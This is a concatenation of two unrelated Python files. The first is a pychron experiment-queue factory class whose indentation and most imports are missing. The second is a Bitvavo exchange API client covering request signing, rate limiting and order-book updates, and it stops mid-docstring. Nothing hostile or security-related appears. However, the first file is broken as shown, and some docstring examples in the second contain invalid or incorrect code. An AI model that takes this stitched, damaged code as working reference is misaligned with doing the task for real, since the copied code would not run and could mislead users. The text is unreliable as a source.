from pychron.pychron_constants import LINE_STR
class ExperimentFactory(DVCAble): #, ConsumerMixin):
run_factory = Instance(AutomatedRunFactory)
queue_factory = Instance(ExperimentQueueFactory)
undoer = Instance(ExperimentUndoer)
generate_queue_button = Button
edit_queue_config_button = Button
auto_gen_config = Instance(AutoGenConfig)
add_button = Button('Add')
clear_button = Button('Clear')
save_button = Button('Save')
edit_mode_button = Button('Edit')
edit_enabled = DelegatesTo('run_factory')
auto_increment_id = Bool(False)
auto_increment_position = Bool(False)
queue = Instance(ExperimentQueue, ())
ok_add = Property(depends_on='mass_spectrometer, extract_device, labnumber, username, load_name')
labnumber = DelegatesTo('run_factory')
load_name = DelegatesTo('queue_factory')
username = DelegatesTo('queue_factory')
mass_spectrometer = DelegatesTo('queue_factory')
extract_device = DelegatesTo('queue_factory')
selected_positions = List
default_mass_spectrometer = Str
_load_persistence_flag = False
# ===========================================================================
    # permissions
# ===========================================================================
# max_allowable_runs = Int(10000)
# can_edit_scripts = Bool(True)
def __init__(self, *args, **kw):
super(ExperimentFactory, self).__init__(auto_setup=False, *args, **kw)
# self.setup_consumer(self._add_run, main=True)
pass
def undo(self):
self.info('undo')
self.undoer.undo()
def sync_queue_meta(self):
self.debug('syncing queue meta')
eq = self.queue
qf = self.queue_factory
for a in ('username', 'mass_spectrometer', 'extract_device',
'email', 'use_email',
'use_group_email',
'load_name', 'tray',
'delay_after_blank',
'delay_between_analyses',
'delay_after_air',
'queue_conditionals_name', 'note'):
if not self._sync_queue_to_factory(eq, qf, a):
self._sync_factory_to_queue(eq, qf, a)
self.debug('run factory set mass spec {}'.format(self.mass_spectrometer))
self.run_factory.set_mass_spectrometer(self.mass_spectrometer)
def _sync_queue_to_factory(self, eq, qf, a):
v = getattr(eq, a)
if isinstance(v, str):
v = v.strip()
if v:
self.debug('sync queue to factory {}>>{}'.format(a, v))
setattr(qf, a, v)
return True
def _sync_factory_to_queue(self, eq, qf, a):
v = getattr(qf, a)
if isinstance(v, str):
v = v.strip()
if v:
self.debug('sync factory to queue {}>>{}'.format(a, v))
setattr(eq, a, v)
def activate(self, load_persistence=True):
# self.start_consuming()
self._load_persistence_flag = load_persistence
self.queue_factory.activate(load_persistence)
self.run_factory.activate(load_persistence)
def destroy(self):
# self.stop_consuming()
self.run_factory.deactivate()
self.queue_factory.deactivate()
def set_selected_runs(self, runs):
self.run_factory.set_selected_runs(runs)
'''
uflag = bool(self.username)
msflag = self.mass_spectrometer not in ('', 'Spectrometer', LINE_STR)
lflag = True
if self.extract_device not in ('', 'Extract Device', LINE_STR):
lflag = bool(self.queue_factory.load_name)
ret = uflag and msflag and lflag
if self.run_factory.run_block in ('RunBlock', LINE_STR):
ret = ret and self.labnumber
return ret
'''
def _add_run(self, *args, **kw):
if not self.ok_add:
missing = []
if not bool(self.username):
missing.append('"Username"')
if self.mass_spectrometer in ('', 'Spectrometer', LINE_STR):
missing.append('"Spectrometer"')
            if self.extract_device not in ('', 'Extract Device', LINE_STR):
if not bool(self.queue_factory.load_name):
missing.append('"Load"')
if self.run_factory.run_block in ('RunBlock', LINE_STR):
if not self.labnumber:
missing.append('"Labnumber"')
f = 'a value'
if len(missing) > 1:
f = 'values'
self.warning_dialog('Please set {} for {}'.format(f, ','.join(missing)))
return
positions = [str(pi.positions[0]) for pi in self.selected_positions]
self.debug('add run positions= {}'.format(positions))
# load_name = self.queue_factory.load_name
q = self.queue
rf = self.run_factory
new_runs, freq = rf.new_runs(q, positions=positions,
auto_increment_position=self.auto_increment_position,
auto_increment_id=self.auto_increment_id)
if new_runs:
aruns = q.automated_runs
if q.selected and q.selected[-1] in aruns:
idx = aruns.index(q.selected[-1])
else:
idx = len(aruns) - 1
runs = q.add_runs(new_runs, freq,
# freq_before=rf.freq_before,
# freq_after=rf.freq_after,
is_run_block=rf.run_block_enabled)
self.undoer.push('add runs', runs)
idx += len(runs)
with rf.update_selected_ctx():
q.select_run_idx(idx)
q.changed = True
# ===============================================================================
# handlers
# ===============================================================================
def _clear_button_fired(self):
self.queue.clear_frequency_runs()
def _add_button_fired(self):
"""
        Only allow the add button to be fired every 0.5 s.
        Use ConsumerMixin.add_consumable instead of frequency limiting.
"""
self.debug('add run fired')
# self.add_consumable(5)
do_later(self._add_run)
def _edit_mode_button_fired(self):
self.run_factory.edit_mode = not self.run_factory.edit_mode
# @on_trait_change('run_factory:clear_end_after')
# def _clear_end_after(self, new):
# print 'enadfas', new
def _update_end_after(self, new):
if new:
for ai in self.queue.automated_runs:
ai.end_after = False
self.run_factory.set_end_after(new)
def _queue_changed(self, new):
self.undoer.queue = new
# @on_trait_change('''queue_factory:[mass_spectrometer,
# extract_device, delay_+, tray, username, load_name,
# email, use_email, use_group_email,
# queue_conditionals_name, repository_identifier]''')
def _update_queue(self, name, new):
self.debug('update queue {}={}'.format(name, new))
if self.queue:
self.queue.trait_set(**{name: new})
self.queue.changed = True
if name == 'repository_identifier':
for a in self.queue.automated_runs:
a.repository_identifier = new
if name == 'mass_spectrometer':
self.debug('_update_queue "{}"'.format(new))
self.mass_spectrometer = new
self.run_factory.set_mass_spectrometer(new)
elif name == 'extract_device':
self._set_extract_device(new)
# do_later(self._set_extract_device, new)
# elif name == 'username':
# self._username = new
# elif name=='email':
# self.email=new
# self.queue.username = new
self._auto_save()
def _auto_save(self):
self.queue.auto_save()
def get_patterns(self):
return self._get_patterns(self.extract_device)
# ===============================================================================
# private
# ===============================================================================
def _set_extract_device(self, ed):
self.debug('setting extract dev="{}" mass spec="{}"'.format(ed, self.mass_spectrometer))
self.run_factory = self._run_factory_factory()
self.run_factory.remote_patterns = patterns = self._get_patterns(ed)
self.run_factory.setup_files()
# self.run_factory.set_mass_spectrometer(self.mass_spectrometer)
if self._load_persistence_flag:
self.run_factory.load()
if self.queue:
self.queue.set_extract_device(ed)
self.queue.username = self.username
self.queue.mass_spectrometer = self.mass_spectrometer
self.queue.patterns = patterns
def _get_patterns(self, ed):
ps = []
service_name = convert_extract_device(ed)
# service_name = ed.replace(' ', '_').lower()
man = self.application.get_service(ILaserManager, 'name=="{}"'.format(service_name))
if man:
ps = man.get_pattern_names()
else:
self.debug('No remote patterns. {} ({}) not available'.format(ed, service_name))
return ps
# ===============================================================================
# property get/set
# ===============================================================================
def _get_ok_add(self):
"""
"""
uflag = bool(self.username)
msflag = self.mass_spectrometer not in ('', 'Spectrometer', LINE_STR)
lflag = True
if self.extract_device not in ('', 'Extract Device', LINE_STR):
lflag = bool(self.queue_factory.load_name)
ret = uflag and msflag and lflag
if self.run_factory.run_block in ('RunBlock', LINE_STR):
ret = ret and self.labnumber
return ret
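    # Illustrative reading of the property above (not in the original source):
    # adding runs requires a username, a concrete mass spectrometer, a load
    # name whenever a real extract device is selected, and a labnumber unless
    # a run block has been chosen.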
# ===============================================================================
#
# ===============================================================================
def _run_factory_factory(self):
if self.extract_device == 'Fusions UV':
klass = UVAutomatedRunFactory
else:
klass = AutomatedRunFactory
rf = klass(dvc=self.dvc,
application=self.application,
extract_device=self.extract_device,
mass_spectrometer=self.mass_spectrometer)
# rf.activate()
# rf.on_trait_change(lambda x: self.trait_set(_labnumber=x), 'labnumber')
rf.on_trait_change(self._update_end_after, 'end_after')
rf.on_trait_change(self._auto_save, 'auto_save_needed')
print('making new factory', id(rf))
return rf
# handlers
# def _generate_runs_from_load(self, ):
# def gen():
# dvc = self.dvc
# load_name = self.load_name
# with dvc.session_ctx():
# dbload = dvc.get_loadtable(load_name)
# for poss in dbload.loaded_positions:
# # print poss
# ln_id = poss.lab_identifier
# dbln = dvc.get_labnumber(ln_id, key='id')
#
# yield dbln.identifier, dbln.sample.name, str(poss.position)
#
# return gen
def _edit_queue_config_button_fired(self):
self.auto_gen_config.run_blocks = self.run_factory.run_blocks
self.auto_gen_config.load()
info = self.auto_gen_config.edit_traits()
if info.result:
self.auto_gen_config.dump()
# def _generate_queue_button_fired(self):
# pd = myProgressDialog()
# pd.open()
#
# ans = list(self._generate_runs_from_load()())
# self._gen_func(pd, ans)
# # t=Thread(target=self._gen_func, args=(pd, ans))
# # t.start()
def _gen_func(self, pd, ans):
import time
pd.max = 100
self.debug('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ generate queue')
auto_gen_config = self.auto_gen_config
# gen = self._generate_runs_from_load()
q = self.queue
rf = self.run_factory
rf.suppress_meta = True
def add_special(ln):
# tt = time.time()
pd.change_message('Add special: {}'.format(ln))
rf.special_labnumber = ln
new_runs, _ = rf.new_runs(q)
q.add_runs(new_runs, 0)
# rf.special_labnumber = ''
# print 'add special {}, {}'.format(ln, time.time()-tt)
st = time.time()
rb = auto_gen_config.end_run_block
if rb and rb in rf.run_blocks:
rf.run_block = auto_gen_config.end_run_block
new_runs, _ = rf.new_runs(q)
q.add_runs(new_runs, 0, is_run_block=False)
for ln, tag in (('Air', 'air'),
('Cocktail', 'cocktail'),
('Blank Unknown', 'blank')):
if getattr(auto_gen_config, 'start_{}'.format(tag)):
add_special(ln)
# for i, (labnumber, sample, position) in enumerate(gen()):
for i, (labnumber, sample, position) in enumerate(ans):
if i:
for ln, tag in (('Blank Unknown', 'blank'),
('Air', 'air'),
('Cocktail', 'cocktail')):
f = getattr(auto_gen_config, '{}_freq'.format(tag))
if f and i % f == 0:
add_special(ln)
pd.change_message('Adding {}. Position: {}'.format(labnumber, position))
# tt = time.time()
rf.labnumber = labnumber
rf.sample = sample
# print 'set ln/sample {} {}'.format(labnumber, time.time()-tt)
new_runs, _ = rf.new_runs(q, positions=position)
# print 'new runs {} {}'.format(labnumber, time.time()-tt)
q.add_runs(new_runs, 0, is_run_block=False)
# print 'add runs {} {}'.format(labnumber, time.time()-tt)
for ln, tag in (('Blank Unknown', 'blank'),
('Air', 'air'),
('Cocktail', 'cocktail')):
if getattr(auto_gen_config, 'end_{}'.format(tag)):
add_special(ln)
rb = auto_gen_config.end_run_block
if rb and rb in rf.run_blocks:
rf.run_block = auto_gen_config.end_run_block
new_runs, _ = rf.new_runs(q)
q.add_runs(new_runs, 0, is_run_block=False)
# print 'finished adding', time.time()-st
q.changed = True
rf.update_info_needed = True
rf.suppress_meta = False
        self.debug('total queue generation time: {:0.3f}s'.format(time.time() - st))
pd.close()
rf.labnumber = ''
rf.sample = ''
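    # A small worked example of the frequency logic in _gen_func: with
    # auto_gen_config.blank_freq == 4, a 'Blank Unknown' is inserted before the 4th,
    # 8th, 12th, ... generated analysis (i % 4 == 0 and i != 0), while the
    # start_*/end_* flags add one-off specials before and after the whole queue.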
def _dvc_changed(self):
self.queue_factory.dvc = self.dvc
self.run_factory.dvc = self.dvc
def _application_changed(self):
self.run_factory.application = self.application
self.queue_factory.application = self.application
def _default_mass_spectrometer_changed(self):
self.debug('default mass spec changed "{}"'.format(self.default_mass_spectrometer))
self.run_factory.set_mass_spectrometer(self.default_mass_spectrometer)
self.queue_factory.mass_spectrometer = self.default_mass_spectrometer
self.mass_spectrometer = self.default_mass_spectrometer
# ===============================================================================
# defaults
# ===============================================================================
def _auto_gen_config_default(self):
ag = AutoGenConfig()
ag.load()
return ag
def _undoer_default(self):
return ExperimentUndoer(run_factory=self.run_factory,
queue=self.queue)
def _run_factory_default(self):
return self._run_factory_factory()
def _queue_factory_default(self):
eq = ExperimentQueueFactory(dvc=self.dvc,
application=self.application)
eq.on_trait_change(self._update_queue, '''mass_spectrometer,
extract_device, delay_+, tray, username, load_name, note,
email, use_email, use_group_email,
queue_conditionals_name, repository_identifier''')
# eq.activate()
return eq
# ============= EOF =============================================
bitvavo.py
import hashlib
import hmac
import json
import time
import datetime as dt
from threading import Thread
from typing import Any, Callable, Dict, List, Union
import websocket as ws_lib
from requests import delete, get, post, put
from structlog.stdlib import get_logger
from websocket import WebSocketApp # missing stubs for WebSocketApp
from bitvavo_api_upgraded.helper_funcs import configure_loggers, time_ms, time_to_wait
from bitvavo_api_upgraded.settings import BITVAVO_API_UPGRADED
from bitvavo_api_upgraded.type_aliases import anydict, errordict, intdict, ms, s_f, strdict
configure_loggers()
logger = get_logger(__name__)
def createSignature(timestamp: ms, method: str, url: str, body: anydict, APISECRET: str) -> str:
string = f"{timestamp}{method}/v2{url}"
if len(body.keys()) != 0:
string += json.dumps(body, separators=(",", ":"))
signature = hmac.new(APISECRET.encode("utf-8"), string.encode("utf-8"), hashlib.sha256).hexdigest()
return signature
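# A minimal sketch (not part of the original module; the secret below is a placeholder)
# showing exactly what createSignature signs: "<timestamp><method>/v2<url>" followed by
# the compact JSON body, HMAC-SHA256'd with the API secret.
def _example_create_signature() -> None:
    timestamp = 1542621155181
    body = {"market": "BTC-EUR", "side": "buy", "orderType": "limit"}
    pre_image = f"{timestamp}POST/v2/order" + json.dumps(body, separators=(",", ":"))
    expected = hmac.new(b"placeholder-secret", pre_image.encode("utf-8"), hashlib.sha256).hexdigest()
    assert createSignature(timestamp, "POST", "/order", body, "placeholder-secret") == expected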
def createPostfix(options: anydict) -> str:
"""Generate a URL postfix, based on the `options` dict.
---
Args:
options (anydict): [description]
---
Returns:
str: [description]
"""
params = [f"{key}={options[key]}" for key in options]
postfix = "&".join(params) # intersperse
return f"?{postfix}" if len(options) > 0 else postfix
def asksCompare(a: float, b: float) -> bool:
return a < b
def bidsCompare(a: float, b: float) -> bool:
return a > b
def sortAndInsert(
asks_or_bids: List[List[str]],
update: List[List[str]],
compareFunc: Callable[[float, float], bool],
) -> Union[List[List[str]], errordict]:
for updateEntry in update:
entrySet: bool = False
for j in range(len(asks_or_bids)):
bookItem = asks_or_bids[j]
if compareFunc(float(updateEntry[0]), float(bookItem[0])):
asks_or_bids.insert(j, updateEntry)
entrySet = True
break
if float(updateEntry[0]) == float(bookItem[0]):
if float(updateEntry[1]) > 0.0:
asks_or_bids[j] = updateEntry
entrySet = True
break
else:
asks_or_bids.pop(j)
entrySet = True
break
if not entrySet:
asks_or_bids.append(updateEntry)
return asks_or_bids
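# A minimal sketch (not in the original module) of how sortAndInsert maintains one side
# of a local order book: unknown price levels are inserted in sorted position, non-zero
# updates replace the existing level, and a zero size removes it.
def _example_sort_and_insert() -> None:
    bids = [["1.20", "5"], ["1.10", "3"]]  # bids are kept sorted from high to low
    bids = sortAndInsert(bids, [["1.15", "2"]], bidsCompare)  # new level -> inserted
    bids = sortAndInsert(bids, [["1.10", "7"]], bidsCompare)  # same price -> replaced
    bids = sortAndInsert(bids, [["1.20", "0"]], bidsCompare)  # zero size -> removed
    assert bids == [["1.15", "2"], ["1.10", "7"]]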
def processLocalBook(ws: "Bitvavo.WebSocketAppFacade", message: anydict) -> None:
market: str = ""
if "action" in message:
if message["action"] == "getBook":
market = message["response"]["market"]
ws.localBook[market]["bids"] = message["response"]["bids"]
ws.localBook[market]["asks"] = message["response"]["asks"]
ws.localBook[market]["nonce"] = message["response"]["nonce"]
ws.localBook[market]["market"] = market
elif "event" in message:
if message["event"] == "book":
market = message["market"]
if message["nonce"] != ws.localBook[market]["nonce"] + 1:
# I think I've fixed this, by looking at the other Bitvavo repos (search for 'nonce' or '!=' 😆)
ws.subscriptionBook(market, ws.callbacks[market])
return
ws.localBook[market]["bids"] = sortAndInsert(ws.localBook[market]["bids"], message["bids"], bidsCompare)
ws.localBook[market]["asks"] = sortAndInsert(ws.localBook[market]["asks"], message["asks"], asksCompare)
ws.localBook[market]["nonce"] = message["nonce"]
if market != "":
ws.callbacks["subscriptionBookUser"][market](ws.localBook[market])
class ReceiveThread(Thread):
def __init__(self, ws: WebSocketApp, ws_facade: "Bitvavo.WebSocketAppFacade"):
self.ws = ws
self.ws_facade = ws_facade
Thread.__init__(self)
def run(self) -> None:
try:
while self.ws_facade.keepAlive:
self.ws.run_forever()
self.ws_facade.reconnect = True
self.ws_facade.authenticated = False
time.sleep(self.ws_facade.reconnectTimer)
if self.ws_facade.bitvavo.debugging:
logger.debug(
f"we have just set reconnect to true and have waited for {self.ws_facade.reconnectTimer}",
)
self.ws_facade.reconnectTimer = self.ws_facade.reconnectTimer * 2
except KeyboardInterrupt:
if self.ws_facade.bitvavo.debugging:
logger.debug("keyboard-interrupt")
def stop(self) -> None:
self.ws_facade.keepAlive = False
def callback_example(response: Any) -> None:
"""
    You can use this example as a starting point for the websocket code, if you want to.
    I made it so you can see what kind of function you'll need to pass into the websocket functions.
"""
if isinstance(response, Dict):
# instead of printing, you could save the object to a file:
import json
from pathlib import Path
HERE = Path.cwd() # root of your project folder
filepath = HERE / "your_output.json"
        # "a" = append; figure out for yourself how to create multiple callback functions, probably one for each type of call that you want to make
with filepath.open("a") as file:
file.write(json.dumps(response))
elif isinstance(response, List):
# Whether `item` is a list or a dict doesn't matter to print
for item in response:
print(item)
# You can also copy-paste stuff to write it to a file or something
        # or maybe mess around with sqlite. ¯\_(ツ)_/¯
else:
# Normally, I would raise an exception here, but the websocket Thread would just eat it up anyway :/
# I don't even know if this log will be shown to you.
# Yes, I haven't tested this function; it's just some off-the-cuff example to get you started.
logger.critical("what in the blazes did I just receive!?")
def error_callback_example(msg: errordict) -> None:
"""
    When using the websocket, I really REALLY recommend using `ws.setErrorCallback(error_callback_example)` instead of
    relying on the default (yes, there is a default on_error function, but it just prints the error, which in practice
    means the user won't see it, as the websocket has a tendency to silently swallow printed output).
    I would recommend adding some alerting mechanism, where the error isn't only written to a log,
    but sent to some external system instead, like Discord, Slack, Email, Signal, Telegram, etc.
    As I said, this is because the websocket silently drops python Exceptions and Bitvavo Errors.
    I can't speak for all options (yet), but the Discord one was VERY easy (mostly because I already had a Discord channel :p)
```shell
pip install discord-webhook
```
Create a webhook for some channel (look for the cog icon) and copy it into a `DISCORD_WEBHOOK` variable
```python
from discord_webhook import DiscordWebhook
# send the message directly to your discord channel! :D
DiscordWebhook(
url=DISCORD_WEBHOOK,
rate_limit_retry=True,
content=f"{msg}",
).execute()
```
"""
# easiest thing is to use the logger, but there's a good chance this message gets silently eaten.
logger.error(msg)
class Bitvavo:
"""
Example code to get your started:
```python
bitvavo = Bitvavo(
{
"APIKEY": "$YOUR_API_KEY",
"APISECRET": "$YOUR_API_SECRET",
"RESTURL": "https://api.bitvavo.com/v2",
"WSURL": "wss://ws.bitvavo.com/v2/",
"ACCESSWINDOW": 10000,
"DEBUGGING": True,
},
)
time_dict = bitvavo.time()
```
"""
def __init__(self, options: Dict[str, Union[str, int]] = {}):
_options = {k.upper(): v for k, v in options.items()}
self.base: str = str(_options.get("RESTURL", "https://api.bitvavo.com/v2"))
self.wsUrl: str = str(_options.get("WSURL", "wss://ws.bitvavo.com/v2/"))
self.ACCESSWINDOW = ms(_options.get("ACCESSWINDOW", 10000))
self.APIKEY = str(_options.get("APIKEY", ""))
self.APISECRET = str(_options.get("APISECRET", ""))
self.rateLimitRemaining: int = 1000
self.rateLimitResetAt: ms = 0
# TODO(NostraDavid) for v2: remove this functionality - logger.debug is a level that can be set
self.debugging = bool(_options.get("DEBUGGING", False))
def calcLag(self) -> ms:
"""
        Calculate the time difference between the client and the server; use this value with BITVAVO_API_UPGRADED_LAG
        when you make an API call, to prevent 304 errors.
Raises KeyError if time() returns an error dict.
"""
        lag_list = [self.time()["time"] - time_ms() for _ in range(10)]
return ms(sum(lag_list) / len(lag_list))
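    # A hedged usage sketch for calcLag: the averaged offset is meant to be fed into the
    # client's lag setting (how BITVAVO_API_UPGRADED.LAG is configured depends on your
    # environment):
    #   bitvavo = Bitvavo()
    #   print(f"client clock is roughly {bitvavo.calcLag()} ms behind the server")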
def getRemainingLimit(self) -> int:
"""Get the remaing rate limit
---
Returns:
```python
1000 # or lower
```
"""
return self.rateLimitRemaining
def updateRateLimit(self, response: Union[anydict, errordict]) -> None:
"""
        Update the rate limit.
        If you're banned, use the error dict to sleep until the ban is lifted.
        If you're not banned, use the received headers to update the rate limit variables.
"""
if "errorCode" in response:
if response["errorCode"] == 105:
self.rateLimitRemaining = 0
# rateLimitResetAt is a value that's stripped from a string.
# Kind of a terrible way to pass that information, but eh, whatever, I guess...
# Anyway, here is the string that's being pulled apart:
# "Your IP or API key has been banned for not respecting the rate limit. The ban expires at ${expiryInMs}""
self.rateLimitResetAt = ms(response["error"].split(" at ")[1].split(".")[0])
timeToWait = time_to_wait(self.rateLimitResetAt)
logger.warning(
"banned",
info={
"wait_time_seconds": timeToWait + 1,
"until": (dt.datetime.now() + dt.timedelta(seconds=timeToWait + 1)).isoformat(),
},
)
logger.info("napping-until-ban-lifted")
time.sleep(timeToWait + 1) # plus one second to ENSURE we're able to run again.
if "Bitvavo-Ratelimit-Remaining" in response:
self.rateLimitRemaining = int(response["Bitvavo-Ratelimit-Remaining"])
if "Bitvavo-Ratelimit-ResetAt" in response:
self.rateLimitResetAt = int(response["Bitvavo-Ratelimit-ResetAt"])
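    # A worked illustration of the two paths above (all values are made up). A ban reply
    # is parsed out of the error string:
    #   {"errorCode": 105, "error": "... The ban expires at 1640819573000."}
    #   -> rateLimitResetAt = 1640819573000, then sleep until that moment has passed.
    # A normal reply updates the counters from the response headers:
    #   {"Bitvavo-Ratelimit-Remaining": "994", "Bitvavo-Ratelimit-ResetAt": "1640819633000"}
    #   -> rateLimitRemaining = 994, rateLimitResetAt = 1640819633000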
def publicRequest(
self,
url: str,
rateLimitingWeight: int = 1,
) -> Union[List[anydict], List[List[str]], intdict, strdict, anydict, errordict]:
"""Execute a request to the public part of the API; no API key and/or SECRET necessary.
        Will return the response as one of three types.
---
Args:
```python
url: str = "https://api.bitvavo.com/v2/time" # example of how the url looks like
```
---
Returns:
```python
# either of one:
Dict[str, Any]
List[Dict[str, Any]]
List[List[str]]
```
"""
if (self.rateLimitRemaining - rateLimitingWeight) <= BITVAVO_API_UPGRADED.RATE_LIMITING_BUFFER:
self.sleep_until_can_continue()
if self.debugging:
logger.debug(
"api-request",
info={
"url": url,
"with_api_key": bool(self.APIKEY != ""),
"public_or_private": "public",
},
)
if self.APIKEY != "":
now = time_ms() + BITVAVO_API_UPGRADED.LAG
sig = createSignature(now, "GET", url.replace(self.base, ""), {}, self.APISECRET)
headers = {
"Bitvavo-Access-Key": self.APIKEY,
"Bitvavo-Access-Signature": sig,
"Bitvavo-Access-Timestamp": str(now),
"Bitvavo-Access-Window": str(self.ACCESSWINDOW),
}
r = get(url, headers=headers, timeout=(self.ACCESSWINDOW / 1000))
else:
r = get(url, timeout=(self.ACCESSWINDOW / 1000))
if "error" in r.json():
self.updateRateLimit(r.json())
else:
self.updateRateLimit(dict(r.headers))
return r.json() # type:ignore
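    # A hedged usage sketch: publicRequest is normally reached through the wrappers below
    # (time, markets, book, ...), but it can be called directly with a full URL:
    #   bitvavo = Bitvavo()
    #   response = bitvavo.publicRequest(f"{bitvavo.base}/time")
    #   # -> {"time": 1539180275424} on success, or an error dict with an "errorCode" key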
def privateRequest(
self,
endpoint: str,
postfix: str,
body: anydict,
method: str = "GET",
rateLimitingWeight: int = 1,
) -> Union[List[anydict], List[List[str]], intdict, strdict, anydict, Any, errordict]:
"""Execute a request to the private part of the API. API key and SECRET are required.
        Will return the response as one of three types.
---
Args:
# TODO(NostraDavid) fill these in
```python
endpoint: str = "/order"
postfix: str = "" # ?key=value&key2=another_value&...
body: anydict = {"market" = "BTC-EUR", "side": "buy", "orderType": "limit"} # for example
method: Optional[str] = "POST" # Defaults to "GET"
```
---
Returns:
```python
# either of one:
Dict[str, Any]
List[Dict[str, Any]]
List[List[str]]
```
"""
if (self.rateLimitRemaining - rateLimitingWeight) <= BITVAVO_API_UPGRADED.RATE_LIMITING_BUFFER:
self.sleep_until_can_continue()
        # if this method breaks: add `= {}` after `body: anydict`
now = time_ms() + BITVAVO_API_UPGRADED.LAG
sig = createSignature(now, method, (endpoint + postfix), body, self.APISECRET)
url = self.base + endpoint + postfix
headers = {
"Bitvavo-Access-Key": self.APIKEY,
"Bitvavo-Access-Signature": sig,
"Bitvavo-Access-Timestamp": str(now),
"Bitvavo-Access-Window": str(self.ACCESSWINDOW),
}
if self.debugging:
logger.debug(
"api-request",
info={
"url": url,
"with_api_key": bool(self.APIKEY != ""),
"public_or_private": "private",
"method": method,
},
)
if method == "DELETE":
r = delete(url, headers=headers, timeout=(self.ACCESSWINDOW / 1000))
elif method == "POST":
r = post(url, headers=headers, json=body, timeout=(self.ACCESSWINDOW / 1000))
elif method == "PUT":
r = put(url, headers=headers, json=body, timeout=(self.ACCESSWINDOW / 1000))
else: # method == "GET"
r = get(url, headers=headers, timeout=(self.ACCESSWINDOW / 1000))
if "error" in r.json():
self.updateRateLimit(r.json())
else:
self.updateRateLimit(dict(r.headers))
return r.json()
def sleep_until_can_continue(self):
napTime = time_to_wait(self.rateLimitResetAt)
logger.warning("rate-limit-reached", rateLimitRemaining=self.rateLimitRemaining)
logger.info("napping-until-reset", napTime=napTime,
currentTime=dt.datetime.now().isoformat(),
targetDatetime=dt.datetime.fromtimestamp(self.rateLimitResetAt / 1000.0).isoformat())
time.sleep(napTime + 1) # +1 to add a tiny bit of buffer time
def time(self) -> intdict:
"""Get server-time, in milliseconds, since 1970-01-01
---
Examples:
* https://api.bitvavo.com/v2/time
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{"time": 1539180275424 }
```
"""
return self.publicRequest(f"{self.base}/time")
def markets(self, options: strdict) -> Union[List[anydict], anydict, errordict]:
"""Get all available markets with some meta-information, unless options is given a `market` key.
Then you will get a single market, instead of a list of markets.
---
Examples:
* https://api.bitvavo.com/v2/markets
* https://api.bitvavo.com/v2/markets?market=BTC-EUR
* https://api.bitvavo.com/v2/markets?market=SHIB-EUR
---
Args:
```python
# Choose one:
options={} # returns all markets
options={"market": "BTC-EUR"} # returns only the BTC-EUR market
# If you want multiple markets, but not all, make multiple calls
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
[
{
"market": "BTC-EUR",
"status": "trading",
"base": "BTC",
"quote": "EUR",
"pricePrecision": "5",
"minOrderInQuoteAsset": "10",
"minOrderInBaseAsset": "0.001",
"orderTypes": [
"market",
"limit",
"stopLoss",
"stopLossLimit",
"takeProfit",
"takeProfitLimit"
]
}
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/markets{postfix}")
def assets(self, options: strdict) -> Union[List[anydict], anydict]:
"""Get all available assets, unless `options` is given a `symbol` key.
Then you will get a single asset, instead of a list of assets.
---
Examples:
* https://api.bitvavo.com/v2/assets
* https://api.bitvavo.com/v2/assets?symbol=BTC
* https://api.bitvavo.com/v2/assets?symbol=SHIB
* https://api.bitvavo.com/v2/assets?symbol=ADA
* https://api.bitvavo.com/v2/assets?symbol=EUR
---
Args:
```python
# pick one
options={} # returns all assets
options={"symbol": "BTC"} # returns a single asset (the one of Bitcoin)
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
[
{
"symbol": "BTC",
"name": "Bitcoin",
"decimals": 8,
"depositFee": "0",
"depositConfirmations": 10,
"depositStatus": "OK",
"withdrawalFee": "0.2",
"withdrawalMinAmount": "0.2",
"withdrawalStatus": "OK",
"networks": ["Mainnet"],
"message": ""
}
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/assets{postfix}")
def book(self, market: str, options: intdict) -> Union[Dict[str, Union[str, int, List[str]]], errordict]:
"""Get a book (with two lists: asks and bids, as they're called)
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/book
* https://api.bitvavo.com/v2/SHIB-EUR/book?depth=10
* https://api.bitvavo.com/v2/ADA-EUR/book?depth=0
---
Args:
```python
market="ADA-EUR"
options={"depth": 3} # returns the best 3 asks and 3 bids
options={} # same as `{"depth": 0}`; returns all bids and asks for that book
```
---
Rate Limit Weight:
```python
1
```
---
Returns:
```python
{
"market": "ADA-EUR",
"nonce": 10378032,
"bids": [["1.1908", "600"], ["1.1902", "4091.359809"], ["1.1898", "7563"]],
"asks": [["1.1917", "2382.166997"], ["1.1919", "440.7"], ["1.192", "600"]],
}
# Notice how each bid and ask is also a list
bid = ["1.1908", "600"] # the first bid from the bids list
price = bid[0] # the price for one coin/token
size = bid[1] # how many tokens are asked (or bidded, in this case)
result = price * size
assert result == 714.48 # EUR can be gained from this bid if it's sold (minus the fee)
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/{market}/book{postfix}")
def publicTrades(self, market: str, options: Dict[str, Union[str, int]]) -> Union[List[anydict], errordict]:
"""Publically available trades
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/trades
* https://api.bitvavo.com/v2/SHIB-EUR/trades?limit=10
* https://api.bitvavo.com/v2/ADA-EUR/trades?tradeIdFrom=532f4d4d-f545-4a2d-a175-3d37919cb73c
* https://api.bitvavo.com/v2/NANO-EUR/trades
---
Args:
```python
market="NANO-EUR"
# note that any of these `options` are optional
# use `int(time.time() * 1000)` to get current timestamp in milliseconds
# or `int(datetime.datetime.now().timestamp()*1000)`
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
```
---
Rate Limit Weight:
```python
5
```
---
Returns:
```python
[
{
"timestamp": 1542967486256,
"id": "57b1159b-6bf5-4cde-9e2c-6bd6a5678baf",
"amount": "0.1",
"price": "5012",
"side": "sell"
}
]
```
"""
postfix = createPostfix(options)
return self.publicRequest(f"{self.base}/{market}/trades{postfix}", 5)
def candles(
self,
market: str,
interval: str,
options: Dict[str, Union[str, int]],
) -> Union[List[List[str]], errordict]:
"""Get up to 1440 candles for a market, with a specific interval (candle size)
Extra reading material: https://en.wikipedia.org/wiki/Candlestick_chart
## WARNING: RETURN TYPE IS WEIRD - CHECK BOTTOM OF THIS TEXT FOR EXPLANATION
---
Examples:
